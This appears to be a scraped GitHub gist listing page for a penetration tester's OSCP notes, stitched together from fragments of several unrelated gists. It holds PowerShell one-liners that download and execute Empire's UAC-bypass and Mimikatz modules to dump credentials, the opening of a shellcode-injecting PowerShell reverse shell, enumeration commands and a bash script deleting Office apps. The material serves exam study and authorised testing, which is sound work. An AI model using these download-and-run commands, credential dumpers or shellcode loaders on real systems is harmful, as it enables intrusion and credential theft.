[TOC]
hostname
systeminfo
whoami
If any part of the SYSTEM %PATH% variable is writeable by Authenticated Users, privesc exists
Steve Stonebraker ssstonebraker
ssstonebraker
/ remove_office_365_mac.sh
Last active
May 3, 2022 20:59
Office 365 Mac 2020 - Delete everything
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| echo " Removing Office 365 apps..." | |
| rm -rf "/Applications/Microsoft Excel.app" | |
| rm -rf "/Applications/Microsoft OneNote.app" | |
| rm -rf "/Applications/Microsoft Outlook.app" | |
| rm -rf "/Applications/Microsoft PowerPoint.app" | |
| rm -rf "/Applications/Microsoft Word.app" | |
| rm -rf "/Applications/Microsoft OneDrive.app" | |
| rm -rf "/Applications/Microsoft Teams.app" |
ssstonebraker
/ aws_scripts.md
Last active
March 29, 2021 18:44
ssstonebraker
/ Pentest-Service-Enumeration-Screenshots.md
Last active
June 30, 2021 03:14
ssstonebraker
/ OSCP_Post_Exploitation.md
Last active
June 13, 2023 19:06
link to project home: https://github.com/n1nj4sec/pupy
Modify pupy.conf Under the section starting with [aliases] you can add them
[aliases]
ssstonebraker
/ OSCP_discovery.md
Last active
September 2, 2024 21:30
ssstonebraker
/ OSCP_Redteam_Powershell_Cheatsheet.md
Last active
May 16, 2024 14:32
Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
ssstonebraker
/ OSCP_Password_Cracking.md
Last active
May 7, 2025 04:53
ssstonebraker
/ OSCP_Privilege_Escalation.md
Last active
January 25, 2025 10:54
ssstonebraker
/ OSCP_Windows_Powershell_Reverse_Shell.ps1
Last active
January 21, 2022 07:48
oscp windows powershell reverse shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $code = ' | |
| [DllImport("kernel32.dll")] | |
| public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); | |
| [DllImport("kernel32.dll")] | |
| public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); | |
| [DllImport("msvcrt.dll")] | |
| public static extern IntPtr memset(IntPtr dest, uint src, uint count);'; | |
| $winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru; | |
| [Byte[]]; | |
| [Byte[]] $sc = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1,0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac,0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3,0x7d,0xf8,0x3b,0x7d, |